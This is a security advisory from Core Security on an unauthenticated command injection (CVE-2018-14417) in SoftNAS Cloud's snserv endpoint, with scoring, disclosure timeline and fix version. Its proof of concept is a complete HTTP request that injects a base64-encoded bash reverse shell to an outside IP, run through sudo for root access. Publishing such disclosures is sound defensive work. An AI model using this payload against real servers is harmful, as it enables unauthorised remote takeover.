CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS
Percentile
98.0%
**Title:**SoftNAS Cloud OS Command Injection
**Advisory ID:**CORE-2018-0009
Advisory URL:<https://www.coresecurity.com/core-labs/advisories/softnas-cloud-os-command-injection>
**Date published:**2018-07-26
**Date of last update:**2018-07-26
**Vendors contacted:**SoftNAS
**Release mode:**Coordinated release
Class: Improper Neutralization of Special Elements used in an OS Command [CWE-78]
**Impact:**Code execution
**Remotely Exploitable:**Yes
**Locally Exploitable:**Yes
CVE Name:CVE-2018-14417
SoftNAS’ website states that:
[1] SoftNAS Cloud is a software-defined NAS filer delivered as a virtual storage appliance that runs within public, private or hybrid clouds. SoftNAS Cloud provides enterprise-grade NAS capabilities, including encryption, snapshots, rapid rollbacks, and cross-zone high-availability with automatic failover.
A command injection vulnerability was found in the web administration console. In particular, snserv script did not sanitize some input parameters before executing a system command.
Other products and versions might be affected, but they were not tested.
SoftNAS released SoftNAS Cloud 4.0.3 that addresses the reported vulnerability. The software update can be performed via the StorageCenter admin UI in the product. For more information on the updating process see: https://www.softnas.com/docs/softnas/v3/html/updating_to_the_latest_version.html.
In addition, SoftNAS published the following release note: https://docs.softnas.com/display/SD/Release+Notes
The vulnerability was discovered and researched by Fernando Díaz and Fernando Catoira from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.
[CVE-2018-14417] The ‘recentVersion’ parameter from the snserv endpoint is vulnerable to OS Command Injection when check and execute update operations are performed. This endpoint has no authentication/session verification. Therefore, it is possible for an unauthenticated attacker to execute malicious code in the target server. As the WebServer runs a Sudoer user (apache), the malicious code can be executed with root permissions.
The following part of the /etc/sudoers file shows the apache user capabilities.
User_Alias APACHE = apache # Once SoftNAS UI is operational, only allow the specific command that require sudo access!! Cmnd_Alias SOFTNAS = ALL APACHE ALL = (ALL) NOPASSWD: SOFTNAS
The following proof of concept generates a remote shell on the target system as root:
GET /softnas/snserver/snserv.php?opcode=checkupdate&opcode=executeupdate&selectedupdate=3.6aaaaaaa.1aaaaaaaaaaaaaa&update_type=standard&recentVersions=3.6aaaaaaaaaaa.1aaaaaaa;echo+YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4yLjQ1LjE4NS8xMjM0NSAwPiYx+|+base64+-d+|+sudo+bash; HTTP/1.1 Host: 10.2.45.208 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https:// 10.2.45.208/softnas/applets/update/ X-Requested-With: XMLHttpRequest Connection: close
As can be seen in the former request the payload had to be base64 encoded as some special characters were not being properly decoded.
[1] <https://www.softnas.com>
CoreLabs, the research center of Core Security, A Fortra Company is charged with researching and understanding security trends as well as anticipating the future requirements of information security technologies. CoreLabs studies cybersecurity trends, focusing on problem formalization, identification of vulnerabilities, novel solutions, and prototypes for new technologies. The team is comprised of seasoned researchers who regularly discover and discloses vulnerabilities, informing product owners in order to ensure a fix can be released efficiently, and that customers are informed as soon as possible. CoreLabs regularly publishes security advisories, technical papers, project information, and shared software tools for public use at <https://www.coresecurity.com/core-labs>.
Core Security, a Fortra Company, provides organizations with critical, actionable insight about who, how, and what is vulnerable in their IT environment. With our layered security approach and robust threat-aware, identity & access, network security, and vulnerability management solutions, security teams can efficiently manage security risks across the enterprise. Learn more at www.coresecurity.com.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or [email protected].
The contents of this advisory are copyright © 2018 Core Security and © 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: <http://creativecommons.org/licenses/by-nc-sa/3.0/us/>
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS
Percentile
98.0%